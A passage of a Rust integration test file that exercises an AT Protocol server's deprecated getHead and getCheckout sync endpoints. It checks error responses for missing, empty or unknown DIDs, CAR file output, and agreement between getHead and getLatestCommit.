        .query(&[("did", "")])
        .send()
        .await
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::BAD_REQUEST);
    let body: Value = res.json().await.expect("Response was not valid JSON");
    assert_eq!(body["error"], "InvalidRequest");
}

/// A whitespace-only `did` value is also rejected.
#[tokio::test]
async fn test_get_head_whitespace_did() {
    let client = client();
    let url = format!("{}/xrpc/com.atproto.sync.getHead", base_url().await);
    let res = client
        .get(url)
        .query(&[("did", " ")])
        .send()
        .await
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::BAD_REQUEST);
}
/// Creating a record produces a new commit, so the head CID must change.
#[tokio::test]
async fn test_get_head_changes_after_record_create() {
    let client = client();
    let (did, jwt) = setup_new_user("gethead-changes").await;
    let url = format!("{}/xrpc/com.atproto.sync.getHead", base_url().await);

    let res1 = client
        .get(url.clone())
        .query(&[("did", did.as_str())])
        .send()
        .await
        .expect("Failed to get initial head");
    let body1: Value = res1.json().await.unwrap();
    let head_before = body1["root"].as_str().unwrap().to_string();

    create_post(&client, &did, &jwt, "Post to change head").await;

    let res2 = client
        .get(url)
        .query(&[("did", did.as_str())])
        .send()
        .await
        .expect("Failed to get head after record");
    let body2: Value = res2.json().await.unwrap();
    let head_after = body2["root"].as_str().unwrap().to_string();

    assert_ne!(head_before, head_after, "Head CID should change after record creation");
}
// --- com.atproto.sync.getCheckout (deprecated endpoint) --------------------

/// Happy path: a repo with a record streams back a non-trivial CAR file
/// with the expected content type.
#[tokio::test]
async fn test_get_checkout_success() {
    let client = client();
    let (did, jwt) = setup_new_user("getcheckout-success").await;
    create_post(&client, &did, &jwt, "Post for checkout test").await;
    let url = format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await);
    let res = client
        .get(url)
        .query(&[("did", did.as_str())])
        .send()
        .await
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::OK);
    let content_type = res
        .headers()
        .get("content-type")
        .and_then(|h| h.to_str().ok());
    assert_eq!(content_type, Some("application/vnd.ipld.car"));
    let body = res.bytes().await.expect("Failed to get body");
    assert!(!body.is_empty(), "CAR file should not be empty");
    assert!(body.len() > 50, "CAR file should contain actual data");
}

/// Unknown DID: 404 with the RepoNotFound error code.
#[tokio::test]
async fn test_get_checkout_not_found() {
    let client = client();
    let url = format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await);
    let res = client
        .get(url)
        .query(&[("did", "did:plc:nonexistent12345")])
        .send()
        .await
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::NOT_FOUND);
    let body: Value = res.json().await.expect("Response was not valid JSON");
    assert_eq!(body["error"], "RepoNotFound");
}

/// Missing `did` query parameter is a 400.
#[tokio::test]
async fn test_get_checkout_missing_param() {
    let client = client();
    let url = format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await);
    let res = client.get(url).send().await.expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::BAD_REQUEST);
}
/// An empty `did` value is rejected with 400.
#[tokio::test]
async fn test_get_checkout_empty_did() {
    let client = client();
    let url = format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await);
    let res = client
        .get(url)
        .query(&[("did", "")])
        .send()
        .await
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::BAD_REQUEST);
}

/// A freshly created account with no records still yields a CAR file
/// (header plus the initial commit).
#[tokio::test]
async fn test_get_checkout_empty_repo() {
    let client = client();
    let (did, _jwt) = setup_new_user("getcheckout-empty").await;
    let url = format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await);
    let res = client
        .get(url)
        .query(&[("did", did.as_str())])
        .send()
        .await
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::OK);
    let body = res.bytes().await.expect("Failed to get body");
    assert!(!body.is_empty(), "Even empty repo should return CAR header");
}
/// A repo with five records produces a noticeably larger CAR file.
#[tokio::test]
async fn test_get_checkout_includes_multiple_records() {
    let client = client();
    let (did, jwt) = setup_new_user("getcheckout-multi").await;
    for i in 0..5 {
        // Small delay between posts; presumably keeps timestamp-derived
        // record keys distinct — confirm against create_post / rkey logic.
        tokio::time::sleep(std::time::Duration::from_millis(50)).await;
        create_post(&client, &did, &jwt, &format!("Checkout post {}", i)).await;
    }
    let url = format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await);
    let res = client
        .get(url)
        .query(&[("did", did.as_str())])
        .send()
        .await
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::OK);
    let body = res.bytes().await.expect("Failed to get body");
    assert!(body.len() > 500, "CAR file with 5 records should be larger");
}

/// The deprecated getHead must agree with the current getLatestCommit.
#[tokio::test]
async fn test_get_head_matches_latest_commit() {
    let client = client();
    let (did, _jwt) = setup_new_user("gethead-matches-latest").await;
    let base = base_url().await;

    let head_res = client
        .get(format!("{}/xrpc/com.atproto.sync.getHead", base))
        .query(&[("did", did.as_str())])
        .send()
        .await
        .expect("Failed to get head");
    let head_body: Value = head_res.json().await.unwrap();
    let head_root = head_body["root"].as_str().unwrap();

    let latest_res = client
        .get(format!("{}/xrpc/com.atproto.sync.getLatestCommit", base))
        .query(&[("did", did.as_str())])
        .send()
        .await
        .expect("Failed to get latest commit");
    let latest_body: Value = latest_res.json().await.unwrap();
    let latest_cid = latest_body["cid"].as_str().unwrap();

    assert_eq!(head_root, latest_cid, "getHead root should match getLatestCommit cid");
}
/// Even for an empty repo the CAR body is at least header-sized
/// (a length-prefixed header needs a minimum of two bytes).
#[tokio::test]
async fn test_get_checkout_car_header_valid() {
    let client = client();
    let (did, _jwt) = setup_new_user("getcheckout-header").await;
    let url = format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await);
    let res = client
        .get(url)
        .query(&[("did", did.as_str())])
        .send()
        .await
        .expect("Failed to send request");
    assert_eq!(res.status(), StatusCode::OK);
    let body = res.bytes().await.expect("Failed to get body");
    assert!(body.len() >= 2, "CAR file should have at least header length");
}